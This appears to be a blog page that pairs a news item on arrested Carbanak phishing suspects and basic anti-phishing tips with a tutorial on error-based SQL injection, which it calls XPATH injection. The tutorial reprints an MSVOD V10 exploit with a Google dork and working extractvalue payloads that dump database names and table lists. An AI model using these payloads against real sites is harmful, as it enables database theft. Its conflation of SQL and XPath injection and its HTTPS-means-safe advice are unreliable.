Social Engineering In Action. Ukranian Hackers Busted!

Free picture (Corruption in Ukraine Ukrainian hackers) from https://new.torange.biz/fx/corruption-ukraine-ukrainian-hackers-172199

The Hack

Three Ukranian hackers connected to attacks on over 100 American businesses have been arrested. They used social engineering attacks and phishing attacks to steal financial information from a lot of businesses.  These hackers were part of the Carbanak Group

Frequently the group would send emails disguised as hotel reservations. Said emails would contain malware designed to steal sensitive data.

The Carbanak Group sent an FDA food poisoning related email to a restaurant. They attached a list of “inspections and checks” which the business opened. Of course, the attachment contained malware.

Dmytro Fedorov, Fedir Hladyr and Andrii Kolpakov are being charged with wire fraud, conspiracy, computer hacking, access device fraud, and identity theft. So it looks like jail time is very likely for the Carbanak Group.

How to prevent

What can I do to prevent such an attack on my personal life or business? Social Engineering attacks are becoming extremely common today, because they are very easy to create and they tend to have a very high payoff for the hacker. First you need to know what phishing is. Phishing is when a hacker disguises some form of web service, message or other form of correspondence to make it appear like its coming from a legitimate source.

So my main advice is to always check the URL. Make sure it is secure (https) and if it has a SSL certificate thats even better. If you recieve an email always look at the domain of the email. Any misspellings in the domain can mean that its fake. If there are attatchments do not open them until you have verification that they are safe. If you cannot get verification that its from a legitimate source, you can always scan the attatchments before opening them, or analyze them within a VM.

Do not give your password away via plaintext ever. Use a VPN if you’re in public as there are potentially people who could be evesdropping on public networks (like at a Starbucks or Mcdonalds Wi-Fi) And Install an Anti-Virus on your PC. Also get the antivirus’s browser addon. These addons can tell you if the site has been reported as a hacked hacked site or a phishing attack.

XPATH SQL Injection Using a Recent Example

Xpath Injection

I’m going to show you a recent example of XPATH injection from exploit-db. This is a common method you’ll have to use when the basic Union Select injection doesn’t work and neither does a string injection. Its a bit more tedious because you’ll have to use limit most of the time.

Fixing Injection

Fixing this kind of injection is relatively simple. According to OWASP:

“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”

OWASP logo

Here Is OWASPs’s article on XPATH Injection Vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you’re an aspiring penetration tester, this is important to know as well so you can advise your clients.

Example exploit

# Exploit Title: MSVOD V10 ¡V SQL Injection # Google Dork: inurl:"images/lists?cid=13" # Date: 2018/07/17 # Exploit Author: Hzllaga # Vendor Homepage: http://www.msvod.cc/ # Version: MSVOD V10 # CVE : CVE-2018-14418 #Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/ Payload: /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
You can tell by looking at the payload that this is an XPATH injection because of the simple fact that it is using “extractvalue”.
Here the cid parameter is vulnerable. But if you were to try union based injection it wouldn’t work. There are a few things to try in this scenario, but one of them is extractvalue.
The actual payload would be
/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --
Other than the Union Select being missing there is really no difference in the injection.
However, In some cases with XPATH injection you will be stuck going by single lines which can be very time consuming. You will have to use
Limit 0,1, limit 1,1, limit 2,1, etc
One example payload where you’d have to use this method:
?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Here is a link to a useful tutorial on XPATH injections. The english is a little bad, but if you have any questions don’t hesitate to ask them in the comments. This is only to be used for educational or legal purposes. Keep in mind that I take no responsibility for your actions.
The exploit-db and CVE: